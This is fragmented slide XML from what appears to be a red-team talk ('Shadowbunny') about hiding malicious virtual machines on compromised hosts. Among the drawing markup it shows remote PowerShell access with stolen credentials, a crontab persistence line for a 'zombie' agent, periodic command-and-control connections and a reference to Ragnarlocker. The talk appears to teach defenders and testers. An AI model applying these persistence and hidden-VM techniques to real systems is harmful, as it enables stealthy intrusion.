                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F80F33-D409-4187-89FE-DCFEF4994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57426" y="3098744"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Graphic 38" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B751AE-D99A-4410-9E9F-96858E803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1344" y="3093028"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Graphic 40" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F74124-14EC-4C60-B56C-112007AFE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9052" y="3070257"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Graphic 42" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51903C0B-539F-4B30-BC76-3E23956CBA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6353" y="3044455"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Graphic 29" descr="Bunny face">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F683D7-BD3B-4592-8D6F-D629F90F6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28451" y="2551779"/>
            <a:ext cx="657250" cy="6572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B9472FF-582A-43FB-97CE-2A84604CB36C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5396782" y="3203049"/>
            <a:ext cx="1120589" cy="727042"/>
            <a:chOff x="5396782" y="3203049"/>
            <a:chExt cx="1120589" cy="727042"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Graphic 12" descr="Download from cloud">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47C68AF3-ED68-4F37-B2BF-2614E078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20934" y="3264724"/>
              <a:ext cx="472285" cy="472285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="Graphic 10" descr="Internet">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325A45D7-4CA0-41BB-9BAF-33DEE03E99F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5396782" y="3203049"/>
              <a:ext cx="1120589" cy="727042"/>
              <a:chOff x="3570431" y="3314699"/>
              <a:chExt cx="876300" cy="533400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48805DA-D557-4E7A-8943-25DAD325D9BE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3684731" y="3314699"/>
                <a:ext cx="647700" cy="438150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                  <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY9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7700" h="438150">
                    <a:moveTo>
                      <a:pt x="590550" y="381000"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57150" y="381000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57150" y="57150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590550" y="57150"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="647700" y="38100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="647700" y="17058"/>
                      <a:pt x="630642" y="0"/>
                      <a:pt x="609600" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17058" y="0"/>
                      <a:pt x="0" y="17058"/>
                      <a:pt x="0" y="38100"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="438150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647700" y="43815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7C4DA4E-B119-4AFA-BB5D-22EC95D3F041}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3570431" y="3790949"/>
                <a:ext cx="876300" cy="57150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                  <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                  <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                  <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                  <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                  <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                  <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                  <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                    <a:moveTo>
                      <a:pt x="495300" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="495300" y="9525"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="495627" y="14459"/>
                      <a:pt x="491891" y="18723"/>
                      <a:pt x="486957" y="19050"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486564" y="19076"/>
                      <a:pt x="486168" y="19076"/>
                      <a:pt x="485775" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="390525" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="385591" y="19377"/>
                      <a:pt x="381327" y="15641"/>
                      <a:pt x="381000" y="10707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380974" y="10314"/>
                      <a:pt x="380974" y="9918"/>
                      <a:pt x="381000" y="9525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="381000" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40092"/>
                      <a:pt x="17058" y="57150"/>
                      <a:pt x="38100" y="57150"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="838200" y="57150"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="859242" y="57150"/>
                      <a:pt x="876300" y="40092"/>
                      <a:pt x="876300" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8763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02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/>
      <p:bldP spid="27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A33150-767F-4A68-96E8-02013C0D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674" y="2069132"/>
            <a:ext cx="5064020" cy="1297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Pre-requisite: </a:t>
            </a:r>
            <a:b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Creation of a nefarious </a:t>
            </a:r>
            <a:b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VM Image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="21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21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Disk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B0B250A-9F17-499A-ACF8-1046BBAF1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574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33150-767F-4A68-96E8-02013C0D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9809214" cy="7076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Offline VM Image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FED6-BF79-459C-A778-EC5549F01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6" y="1999130"/>
            <a:ext cx="10669828" cy="457199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Operating System - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ragnarlocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> uses Windows XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image format (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vdi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vhd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vhdx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vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,…) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zombies, agents, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installation of useful “guest” software (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VBoxGuestAdditions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Telemetry and anti-virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Distribution</a:t>
            </a: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Graphic 4" descr="Download from cloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC31AD3-70CC-4D27-AA29-B276408B1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5663" y="4994912"/>
            <a:ext cx="472285" cy="472285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Zombie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506816D2-E79C-4217-9405-6ADF34CA9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2646" y="3276600"/>
            <a:ext cx="779930" cy="7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3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579C-0604-48A3-B8D0-C5135ED4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Periodically connecting to CNC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D319-5AF1-41E9-A3AA-FA1D9409B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62129" cy="4351338"/>
          </a:xfrm>
        </p:spPr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Edit crontab on VM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sudo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crontab –e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5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1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Using flock to ensure zombie is running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* * * * * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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usr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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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flock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-n /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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tmp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zombie.lock</a:t>
            </a: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shadowbunny</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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Graphic 4" descr="Zombie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F9110C-9CC0-4DCF-A278-85AF46646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284" y="4384921"/>
            <a:ext cx="771705" cy="909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00D199-C97A-4465-8BDF-42B9F454C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976" y="1727534"/>
            <a:ext cx="5605168" cy="26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3E74-79FA-4F79-A6DA-8A26F486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8C5CA-5192-4729-8BAB-A2F4B6CF5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phic 4" descr="Download from cloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C473A882-32FC-4CB1-8BE6-97209A4BE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922" y="2580113"/>
            <a:ext cx="2580384" cy="25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8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7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FBA83-1E8C-4889-A0DA-D10B21C8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676" y="2517367"/>
            <a:ext cx="3484291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Compromise</a:t>
            </a:r>
            <a:b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4" descr="Devil face outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E4B60EE-35E1-490B-A627-3FB3ED359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36" name="Group 21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Freeform: Shape 23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132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44BF-EBC6-41F6-8EAE-CBBB04B4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Introduction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0EB7A-6818-42B3-AB3E-F130D725A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301" y="4601523"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfr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A63A8F-1C6C-4802-96E4-DBA0EB203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35" y="4601523"/>
            <a:ext cx="952500" cy="9525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087F24-6952-4460-9B1D-8E7653CAF0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4764" r="6607" b="6812"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8853268" y="4601523"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A picture containing outdoor, water, flying, air&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E587FB7-BCEE-4942-9193-07E0D429D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2" y="4601523"/>
            <a:ext cx="952500" cy="95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AC39F-9DDE-42D8-AE8C-75B179249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68" y="1891582"/>
            <a:ext cx="2018116" cy="2491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57DBB-0840-4629-B036-E7084269D938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897465" y="2015067"/>
            <a:ext cx="7627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Enjoy breaking things and help fixing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Established and managed multiple offensive security teams throughout career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Always learning and love teaching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Twitter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>@wunderwuzzi23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Blog: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://embracethered.com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472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3AC5F-62CB-4910-B023-CB5A9A01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Assume Breach - Acquiring target host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EEB23-CC1C-48AF-B382-D034A1F63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6817F-FD4E-4166-81DD-521AADEEC231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713380" y="2490441"/>
            <a:ext cx="8926606" cy="18771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$creds = Get-Credential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Enter-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PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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-Computer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targethost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-Port 5986 </a:t>
            </a:r>
            <a:b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-Credential $creds –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UseSSL</a:t>
            </a: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17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E4A51-91F2-4E54-A709-EA50033C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76" y="2020018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Installing/Enabling Virtualization Software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9B96FC-2213-44C7-B732-9683F2DE64B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="429349" y="2251195"/>
            <a:ext cx="3661831" cy="2375809"/>
            <a:chOff x="3115187" y="3203049"/>
            <a:chExt cx="1120589" cy="7270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98FDDD2-E50D-45B8-A615-29DA691C3087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3115187" y="3203049"/>
              <a:ext cx="1120589" cy="727042"/>
              <a:chOff x="3115187" y="3203049"/>
              <a:chExt cx="1120589" cy="727042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ADD8D02-3CEE-4396-905B-742F18633773}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3261351" y="3203049"/>
                <a:ext cx="828261" cy="597213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                  <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY9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7700" h="438150">
                    <a:moveTo>
                      <a:pt x="590550" y="381000"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57150" y="381000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57150" y="57150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590550" y="57150"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="647700" y="38100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="647700" y="17058"/>
                      <a:pt x="630642" y="0"/>
                      <a:pt x="609600" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17058" y="0"/>
                      <a:pt x="0" y="17058"/>
                      <a:pt x="0" y="38100"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="438150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647700" y="43815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311C822-F371-47B6-BE71-6E25C079BB6B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3115187" y="3852194"/>
                <a:ext cx="1120589" cy="77897"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                  <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                  <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                  <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                  <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                  <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                  <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                  <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                    <a:moveTo>
                      <a:pt x="495300" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="495300" y="9525"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="495627" y="14459"/>
                      <a:pt x="491891" y="18723"/>
                      <a:pt x="486957" y="19050"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486564" y="19076"/>
                      <a:pt x="486168" y="19076"/>
                      <a:pt x="485775" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="390525" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="385591" y="19377"/>
                      <a:pt x="381327" y="15641"/>
                      <a:pt x="381000" y="10707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380974" y="10314"/>
                      <a:pt x="380974" y="9918"/>
                      <a:pt x="381000" y="9525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="381000" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40092"/>
                      <a:pt x="17058" y="57150"/>
                      <a:pt x="38100" y="57150"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="838200" y="57150"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="859242" y="57150"/>
                      <a:pt x="876300" y="40092"/>
                      <a:pt x="876300" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8763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CE8E40-5E55-412B-9762-CF8AF23764E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3506825" y="3511782"/>
              <a:ext cx="404232" cy="241124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10000"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="5000" b="1" dirty="0"/>
                <a:t>VM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54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CD8C-5199-4369-A241-EDF2AA6E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one to choose?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94D1A-62B4-4DE4-B769-E25A21A4F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Operating system of target host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compatibility issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Isolation requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host access: Shared Folders, web cam,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic launch upon reboot of host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0149F-7F35-4FD3-80E1-2515B93D3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58" y="2545128"/>
            <a:ext cx="2041794" cy="320854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7CB144C6-84F7-457F-A2F4-5EB5D77F5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263" y="1862490"/>
            <a:ext cx="2087541" cy="893896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A picture containing sitting, blue&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C8268F-889F-407E-B2AA-6CFAB243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16" y="3157664"/>
            <a:ext cx="1532922" cy="1532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96E6A2-2063-4FE0-A2DA-9A6D44294A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11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10236262" y="4001159"/>
